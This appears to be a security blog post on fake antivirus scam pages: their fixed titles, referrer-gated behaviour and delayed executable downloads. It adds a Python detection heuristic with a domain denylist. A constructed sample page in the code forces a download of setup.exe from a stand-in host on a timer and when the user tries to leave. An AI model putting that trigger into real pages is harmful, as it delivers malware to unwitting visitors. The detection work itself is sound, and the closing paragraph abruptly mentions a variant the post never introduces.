Malicious fake antivirus pages are nearly all alike, built from very straightforward code, which makes them relatively easy to detect. Most of these pages are also hosted on just a few domains (mostly on sub-domains of xorg.pl, although the predominance of this domain has decreased lately), which makes it possible to denylist them (although this is not the best protection).
The "original" fake AV page is made of:
- a simple HTML page which displays a warning about your PC being infected and shows a splash screen. The page title is always the same, as is the text displayed while the page is loading. The main page is displayed only if you arrive from a hacked site; direct access to the page returns a 404 "page not found" error.
- the malicious executable, which is downloaded after the animation has completed, or when the user attempts to close the page
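The traits listed above (a fixed page title, a download fired from a timer or from the unload handler, referrer-gated 404 behaviour, and hosting on sub-domains of one domain) are all things a crawler or proxy can check for. The following Python heuristic is an added example, not code from the original post; the title string is a labelled placeholder because the post does not quote the real one, and the sample HTML is constructed to exercise the checks:

```python
import re
from urllib.parse import urlparse

# The post says the title is always the same but does not quote it, so this
# is a placeholder to be replaced with the observed string.
KNOWN_TITLES = {"PLACEHOLDER_FAKE_AV_TITLE"}

# Hosting domain named in the post; sub-domains of it are denylisted.
DENYLISTED_DOMAINS = {"xorg.pl"}

EXE_REF = re.compile(r"""[^\s'"]+\.exe\b""", re.I)
UNLOAD_HANDLER = re.compile(r"\bon(?:before)?unload\b", re.I)
TIMER_CALL = re.compile(r"\bset(?:Timeout|Interval)\s*\(", re.I)
LOCATION_ASSIGN = re.compile(r"\b(?:window\.|document\.)?location(?:\.href)?\s*=", re.I)


def extract_scripts(html):
    """Concatenate the bodies of all <script> elements."""
    return "\n".join(re.findall(r"<script[^>]*>(.*?)</script>", html, re.I | re.S))


def page_title(html):
    m = re.search(r"<title[^>]*>(.*?)</title>", html, re.I | re.S)
    return m.group(1).strip() if m else ""


def fake_av_indicators(html):
    """Return the individual static signals found in a fetched page."""
    scripts = extract_scripts(html)
    has_exe = bool(EXE_REF.search(scripts))
    return {
        # fixed title shared by the kit
        "known_title": page_title(html) in KNOWN_TITLES,
        # executable fetched when the user tries to leave the page
        "exe_on_unload": has_exe and bool(UNLOAD_HANDLER.search(html)),
        # executable fetched after a delay (the "scan" animation)
        "exe_on_timer": has_exe
        and bool(TIMER_CALL.search(scripts))
        and bool(LOCATION_ASSIGN.search(scripts)),
    }


def is_fake_av(html):
    """Require two independent signals so one regex hit alone does not flag a page."""
    return sum(fake_av_indicators(html).values()) >= 2


def referrer_gated(status_direct, status_with_referrer):
    """True when the page only serves content to visitors arriving via a referrer."""
    return status_direct == 404 and status_with_referrer == 200


def on_denylisted_domain(url):
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in DENYLISTED_DOMAINS)


# Constructed sample pages (not real fake-AV markup) for a quick self-check.
SUSPECT_HTML = """<html><head><title>PLACEHOLDER_FAKE_AV_TITLE</title>
<script>
function dl(){ window.location = 'http://example.invalid/setup.exe'; }
window.onbeforeunload = function(){ dl(); };
setTimeout(dl, 9000);
</script></head><body>Please wait while your system is being scanned...</body></html>"""

BENIGN_HTML = """<html><head><title>My holiday photos</title>
<script>setTimeout(function(){ document.getElementById('x').style.display='block'; }, 500);</script>
</head><body><div id="x">Hello</div></body></html>"""

if __name__ == "__main__":
    print("suspect:", fake_av_indicators(SUSPECT_HTML), is_fake_av(SUSPECT_HTML))
    print("benign:", fake_av_indicators(BENIGN_HTML), is_fake_av(BENIGN_HTML))
    print("referrer gated:", referrer_gated(404, 200))
    print("denylisted:", on_denylisted_domain("http://scan.xorg.pl/index.php"))
```

The referrer check needs two fetches of the same URL (one with an empty Referer header, one with a plausible one); only the comparison of the two status codes is shown here. The static checks are deliberately conservative and should be combined with the denylist rather than used alone, since any one regex can match legitimate pages.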
In addition to the code obfuscation, the page title and the waiting text differ slightly from those of the original fake AV page. The malicious payload is detected by only 6 AV vendors out of 41. Another sample that I discovered was detected by only 2 AV vendors!